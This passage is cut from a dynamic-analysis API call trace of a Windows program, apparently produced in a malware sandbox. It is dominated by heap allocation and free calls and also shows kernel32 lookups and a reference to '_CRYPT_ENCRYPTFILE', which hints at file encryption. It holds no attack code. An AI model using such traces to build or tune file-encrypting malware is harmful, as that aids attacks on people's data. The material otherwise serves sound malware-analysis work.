out: hHeap=0x1780000) returned 1 [0099.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0099.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0099.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0099.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0099.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0099.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0099.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0099.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0099.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0099.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0099.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0099.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0099.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0099.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0099.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0099.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0099.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0099.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0099.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0099.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0099.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0099.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0099.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0099.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0099.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0099.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0099.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0099.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0099.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0099.641] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0099.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0099.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9a40 [0099.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0099.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0099.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0099.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0099.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0099.642] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0099.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0099.642] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0099.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0099.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0099.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0099.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0099.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0099.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0099.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0099.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0099.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0099.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0099.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0099.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0099.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0099.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0099.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0099.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0099.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0099.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0099.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0099.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0099.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0099.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0099.729] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0099.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0099.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0099.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0099.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0099.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0099.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0099.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0099.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0099.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0099.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0099.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0099.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0099.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0099.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0099.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0099.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0099.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0099.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0099.730] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0099.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0099.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0099.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca088 [0099.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca088, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0099.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0099.730] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0099.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0099.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0099.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0099.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0099.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0099.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0099.731] CloseHandle (hObject=0x258) returned 1 [0099.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0099.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eab80 [0099.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0099.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0099.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0099.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0099.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0099.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0099.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0099.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0099.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0099.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0099.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0099.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0099.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0099.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0099.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0099.732] FreeLibrary (hLibModule=0x772d0000) returned 1 [0099.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0099.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0099.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0099.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0099.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0099.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0099.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0099.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0099.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0099.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0099.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0099.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0099.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0099.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0099.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0099.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0099.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0099.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0099.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0099.732] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0099.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0099.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0099.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0099.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0099.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0099.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0099.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0099.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0099.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0099.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e48 | out: hHeap=0x1780000) returned 1 [0099.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0099.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0099.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0099.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0099.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0099.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0099.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0099.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0099.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0099.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0099.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0099.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0099.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0099.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0099.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0099.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0099.733] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0099.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0099.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0099.734] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0099.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0099.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0099.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0099.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2510 [0099.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0099.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0099.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0099.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0099.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0099.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2450 [0099.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0099.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0099.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0099.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0099.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0099.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0099.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0099.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0099.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0099.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0099.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0099.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0099.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2410 [0099.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0099.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0099.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0099.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0099.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2520 [0099.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e48 [0099.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0099.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0099.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9b90 [0099.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0099.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0099.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0099.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0099.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0099.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0099.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0099.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0099.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0099.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0099.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0099.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0099.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0099.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0099.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0099.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0099.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0099.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0099.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0099.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0099.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0099.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0099.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0099.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0099.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0099.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0099.736] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0099.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0099.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0099.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0099.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0099.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0099.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0099.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0099.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0099.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0099.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0099.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0099.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0099.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0099.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0099.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0099.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0099.737] HeapFree (in: 